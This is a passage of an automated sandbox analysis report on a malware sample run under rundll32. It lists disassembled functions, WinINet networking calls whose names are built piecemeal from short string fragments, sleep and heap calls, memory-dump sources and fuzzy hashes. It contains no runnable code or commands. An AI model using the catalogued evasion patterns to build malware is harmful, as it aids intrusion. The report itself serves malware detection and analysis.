Instruction Fuzzy Hash: 2E90023560610403F50471584614786100987D0245F61E815A1C195A8DC7A5D95175E2

Uniqueness

Uniqueness Score: -1.00%

Function 043A2C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2C3A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e4470072fc24e9b1424e040b20ce4f863a7b964befae4fa221cff3518281c0a
Instruction ID: 2b89149a4803b5fb4f80e11f3d21ad19ea6570b1bcd417ae43cd50de832a25b0
Opcode Fuzzy Hash: 3e4470072fc24e9b1424e040b20ce4f863a7b964befae4fa221cff3518281c0a
Instruction Fuzzy Hash: 1390022D21300003F5847158550878A000987D1246F91F819A180A598CC925D8696361

Uniqueness

Uniqueness Score: -1.00%

Function 043A2CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2CFA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 20602f1040717672a303748b4210c1da5ddf94446677db792630b29699340ba2
Instruction ID: 34809b09234aab08af3bc5439d87b485b94d9ddfe9c0864cf7bc4f1817b50e74
Opcode Fuzzy Hash: 20602f1040717672a303748b4210c1da5ddf94446677db792630b29699340ba2
Instruction Fuzzy Hash: 3C900225243041537949B1584504687400A97E0285791E416A2C09990CC536E856E661

Uniqueness

Uniqueness Score: -1.00%

Function 043A2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2D1A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33e4917bb3c8d13b70d674bb67b18bf16df453058a81d2f74556909c909988e3
Instruction ID: faf9a378fb07e6a849d85db2a0c5215f92fcc35715f48b6bc9e2e6fe1a7e9e30
Opcode Fuzzy Hash: 33e4917bb3c8d13b70d674bb67b18bf16df453058a81d2f74556909c909988e3
Instruction Fuzzy Hash: 0290023520200413F51571584604787000D87D0285F91E816A1C19598DD666D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 043A2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2DCA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a8e214b5c585a5b298db4f4a3d20f3df6db2b03c455f568094c6f9f6166438f
Instruction ID: ff209d3034794d5507eb559da6b850f9e500dca11f6737f76f34a55d87fc6ed1
Opcode Fuzzy Hash: 5a8e214b5c585a5b298db4f4a3d20f3df6db2b03c455f568094c6f9f6166438f
Instruction Fuzzy Hash: B790027520200403F544715845047C6000987D0345F51E415A6859594EC669DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 043A2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2E5A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0995ac71957f608619e47b8d481254b2004b09d111fbf5d2e95a2d6b42dbe76e
Instruction ID: be3f0c5e5fdd6210d7e0c6b8dc999d79235f332343313620a93d324654ae543f
Opcode Fuzzy Hash: 0995ac71957f608619e47b8d481254b2004b09d111fbf5d2e95a2d6b42dbe76e
Instruction Fuzzy Hash: 4090026534200443F50471584514B860009C7E1345F51E419E2859594DC629DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 043A2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2F0A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30cebfca397f929345762a00c5676f63e90f1fd84436695ce62c71bbc5612f19
Instruction ID: e622ef3787fe945459d44366769b1d24d6404bca288892d341e8117849b9dcb0
Opcode Fuzzy Hash: 30cebfca397f929345762a00c5676f63e90f1fd84436695ce62c71bbc5612f19
Instruction Fuzzy Hash: 8090022521280043F60475684D14B87000987D0347F51E519A1949594CC925D8616561

Uniqueness

Uniqueness Score: -1.00%

Function 043A2FB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2FBA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71fdde7b3ca5c7a58c47abf2421626d285f65b5bb04bb23401c0d7ecac8ef4b1
Instruction ID: 75340327b335087e31e56ee9c0325c38f0cb90b8c22fe3e23279cd3c245ba9c6
Opcode Fuzzy Hash: 71fdde7b3ca5c7a58c47abf2421626d285f65b5bb04bb23401c0d7ecac8ef4b1
Instruction Fuzzy Hash: DC90022524200803F54471588514787000AC7D0645F51E415A1819594DC626D96576F1

Uniqueness

Uniqueness Score: -1.00%

Function 043A29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A29FA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85036e4a2cd11f4b2328ae5da89d5d239aa57ace44dad765e3686742d30c30ac
Instruction ID: 0a8840e33a242e2697c9a975fbd78968cbdda95e105ebf61a558599706947e59
Opcode Fuzzy Hash: 85036e4a2cd11f4b2328ae5da89d5d239aa57ace44dad765e3686742d30c30ac
Instruction Fuzzy Hash: 4D900229212000032509B5580704687004A87D5395351E425F280A590CD631D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 043A2A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2A8A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f0a7d74872905c194c4590d62d46a4f0394c0a60cb0f96f8ab3549b9c6dbba04
Instruction ID: ae8c6cfa1c8567b5cfa04f28adfbb6255c35385f8d85fa71dcae17b3044cfdb3
Opcode Fuzzy Hash: f0a7d74872905c194c4590d62d46a4f0394c0a60cb0f96f8ab3549b9c6dbba04
Instruction Fuzzy Hash: 5190026520300003650971584514796400E87E0245B51E425E28095D0DC535D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 043A2AC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2ACA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6124f23a5fef839d03090145a425e570fc49a6b1b074ad0ff3d191e240efcc08
Instruction ID: 9b429295374de5249bbe73c1c767c60c57e458baf471df2ee84d51428cdee383
Opcode Fuzzy Hash: 6124f23a5fef839d03090145a425e570fc49a6b1b074ad0ff3d191e240efcc08
Instruction Fuzzy Hash: D290023560600803F554715845147C6000987D0345F51E415A1819694DC765DA5576E1

Uniqueness

Uniqueness Score: -1.00%

Function 043A2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2B1A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee35dc5f731832f89375b2557f28afafa21a8dd9dd4c321dbeebe516c5c44b0c
Instruction ID: bcc6cc61b7cf4d5f67daf55dd2ce79891b508d9689ceab529f45f17b13480c9c
Opcode Fuzzy Hash: ee35dc5f731832f89375b2557f28afafa21a8dd9dd4c321dbeebe516c5c44b0c
Instruction Fuzzy Hash: 0990023520200803F584715845047CA000987D1345F91E419A181A694DCA25DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 043A2B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2B0A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dafcda1522b7a6d1f6016ab091a0d50b015526066d41cc003d732d4ca66389e
Instruction ID: baa863b25028cfb21c1f2f93279d455caa0223871067a0c22169ada4f491b718
Opcode Fuzzy Hash: 2dafcda1522b7a6d1f6016ab091a0d50b015526066d41cc003d732d4ca66389e
Instruction Fuzzy Hash: E190023520604843F54471584504BC6001987D0349F51E415A18596D4DD635DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 043A2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2B9A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a24722ff5c7be9ade63b597acaba91ba9c80f658f419a230bf807cf711ae5128
Instruction ID: cd6bc7ded5aae1963c03fd51d336fb44d5860b10505f0596859aa3e4658a7f4c
Opcode Fuzzy Hash: a24722ff5c7be9ade63b597acaba91ba9c80f658f419a230bf807cf711ae5128
Instruction Fuzzy Hash: 2C90023520208803F514715885047CA000987D0345F55E815A5C19698DC6A5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 043A2B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2B8A

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67412830921be99977c8c02b0f348852f7dcdb07692f572b6c7eed86d5fe2a4d
Instruction ID: ed28cc362e200a3c01d5d85404e7af0e7c4ffff89ec3ba538c9595f773eec570
Opcode Fuzzy Hash: 67412830921be99977c8c02b0f348852f7dcdb07692f572b6c7eed86d5fe2a4d
Instruction Fuzzy Hash: 2E90023520200843F50471584504BC6000987E0345F51E41AA1919694DC625D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 043A2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A2BCA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a965c5d23ca81197349f180450e8a3f8e2ddac25ef007718c02e55f1fbfcb923
Instruction ID: 3155a17b84d3eb6c24cc45a7a7a41c8ab97d9251123471fdbe17db82647f0edc
Opcode Fuzzy Hash: a965c5d23ca81197349f180450e8a3f8e2ddac25ef007718c02e55f1fbfcb923
Instruction Fuzzy Hash: E690023520200403F504759855087C6000987E0345F51F415A6819595EC675D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 00418D70, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00418DCC

Strings

HttpSendRequestA, xrefs: 00418DBE, 00418DC9
Send, xrefs: 00418D91
Http, xrefs: 00418D8A
SendRequestA, xrefs: 00418DC2, 00418DCA
Requ, xrefs: 00418D98
HttpSendRequestA, xrefs: 00418D7D
RequestA, xrefs: 00418DC6, 00418DCB
estA, xrefs: 00418D9F

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction ID: 4f936be155798faaa0b2a9e2e909207ed3ac3c7b80bb7ae58ddfac945b2fba80
Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction Fuzzy Hash: 18014BB2905219AFCB04DF98D841AEFBBB8EB58210F108189FD08A7304D670EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418C70, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00418CD8

Strings

Conn, xrefs: 00418C98
ConnectA, xrefs: 00418CD2, 00418CD7
rnet, xrefs: 00418C91
rnetConnectA, xrefs: 00418CCE, 00418CD6
InternetConnectA, xrefs: 00418CCA, 00418CD5
Inte, xrefs: 00418C8A
ectA, xrefs: 00418C9F

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction ID: 54fcc15e06e19dd10cd9518ef0310ce6ca8bbd195a027a2556502f1bfe8910d7
Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction Fuzzy Hash: 8E01E9B2915119AFCB14DF99D941EEF77B8EB48314F154289FE08A7241D634EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418C00, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00418C57

Strings

Inte, xrefs: 00418C1A
Open, xrefs: 00418C28
rnet, xrefs: 00418C21
rnetOpenA, xrefs: 00418C51, 00418C56
InternetOpenA, xrefs: 00418C4D, 00418C55
A, xrefs: 00418C2F

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction ID: a0f79bcc74c24749c030f5f4821d4f6029ea6111142c2d96cfa58afdff09fbce
Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction Fuzzy Hash: 78F0F6B2A01128AF9B14DF99D8419EBB7B8EB48310B04858EBE1897201D635AE508BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418BF8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 38
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00418C57

Strings

Inte, xrefs: 00418C1A
Open, xrefs: 00418C28
rnet, xrefs: 00418C21
rnetOpenA, xrefs: 00418C51, 00418C56
InternetOpenA, xrefs: 00418C4D, 00418C55
A, xrefs: 00418C2F

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: b3abdee364784b4e8809aabd4f4d60a8d1c0cb5efe5e0280e3e0dbccb7aa2cac
Instruction ID: 74db2d65b42f6a31a1807804714bd7cdbe49c7c2b9f887d6caf84b8a808a69c7
Opcode Fuzzy Hash: b3abdee364784b4e8809aabd4f4d60a8d1c0cb5efe5e0280e3e0dbccb7aa2cac
Instruction Fuzzy Hash: 0601FBB1901129AF8B14DF99D8459EB7BB8FF48310B04858DFE189B201D635EA50CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418E4B, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 36networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00418E9F

Strings

rnet, xrefs: 00418E71
CloseHandle, xrefs: 00418E9B, 00418E9E
Inte, xrefs: 00418E6A
Clos, xrefs: 00418E78
eHan, xrefs: 00418E7F
dle, xrefs: 00418E86

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: da84efcd08f44eff9cc2e4df866adb6372bc8fde6d7ab5fa548fe9ab716c1e8e
Instruction ID: 46c68265ec712a20baca453a1e9300044e6b2aa79663cd95011a7d7191c7cb81
Opcode Fuzzy Hash: da84efcd08f44eff9cc2e4df866adb6372bc8fde6d7ab5fa548fe9ab716c1e8e
Instruction Fuzzy Hash: 21F06272C11228AB8B00DFD9D9419EA7B78EB85310F114589ED08AB201D6749B00CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00418E50, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00418E9F

Strings

rnet, xrefs: 00418E71
CloseHandle, xrefs: 00418E9B, 00418E9E
Inte, xrefs: 00418E6A
Clos, xrefs: 00418E78
eHan, xrefs: 00418E7F
dle, xrefs: 00418E86

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: 5dbf4104c698586ebdf7b707d1bf2520d912350f86961b26068399d97cf18735
Instruction ID: 3bba89c094966dca0bad3af9027282bf5e064592af05f17a3593051ab27f52aa
Opcode Fuzzy Hash: 5dbf4104c698586ebdf7b707d1bf2520d912350f86961b26068399d97cf18735
Instruction Fuzzy Hash: 4DF03072D05228AF8B10DFD9D9459EFBBB8EB45310F108589ED48AB201D6709B10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418DDB, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 28networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 00418E9F

Strings

rnet, xrefs: 00418E71
CloseHandle, xrefs: 00418E9B, 00418E9E
Inte, xrefs: 00418E6A
Clos, xrefs: 00418E78
eHan, xrefs: 00418E7F
dle, xrefs: 00418E86

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: 599ad50ad9df8bf00b0f676a2076f7703efbd109d238da0eb0393eb4a4cf26ec
Instruction ID: 5c613cbd2282e9b4a36b2b8bf5a70c6b53e3d65224fe780f976acd854932d3cf
Opcode Fuzzy Hash: 599ad50ad9df8bf00b0f676a2076f7703efbd109d238da0eb0393eb4a4cf26ec
Instruction Fuzzy Hash: 7CF01CB1C05268AB8B11DFDA99056EABBB4EB41710B148A8EEA487B201D6745B018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 004173A8

Strings

net.dll, xrefs: 00417371, 004173F7, 004173CF, 004173DB, 00417403
wininet.dll, xrefs: 0041735E, 00417367

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 5c038c109a318ea23aad09a44560aa23916a15417a602348ff7e9a32929f47a4
Instruction ID: b66ed6e082027d42ae5b2b6675ce4a2daf228ce1d32695697f2b26fa5db8665f
Opcode Fuzzy Hash: 5c038c109a318ea23aad09a44560aa23916a15417a602348ff7e9a32929f47a4
Instruction Fuzzy Hash: 9731B2B6505704ABC711DF65C8A1FA7B7B8BF48704F00811EFA199B241D734B485CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004172FE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 004173A8

Strings

net.dll, xrefs: 00417371, 004173CF, 004173DB
wininet.dll, xrefs: 0041735E, 00417367

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 0b8ba3633e0180b8872c9b6a792d714606eb393f53b604bd2bc7ad69db50ab50
Instruction ID: 2504db3e1eb65449d4b793a92dd7d7b0147c6d3321c3c8ba692f00a9e85749a6
Opcode Fuzzy Hash: 0b8ba3633e0180b8872c9b6a792d714606eb393f53b604bd2bc7ad69db50ab50
Instruction Fuzzy Hash: 1021D6B1505304ABC710DF69C8A1FABBBB4FF48704F00812EFA199B242D774A495CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004188E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 0041891D

Strings

.z`, xrefs: 0041890C, 00418918

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
Instruction ID: 254ebd78c134e86961edc2b83238041f98d8b30b9d575ea6a8a1165c1b86d8df
Opcode Fuzzy Hash: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
Instruction Fuzzy Hash: 7DF06DB1200218ABEB18DFA8DC49EEB37A8EF84790F118599FD485B241C631E914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 0041891D

Strings

.z`, xrefs: 0041890C, 00418918

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
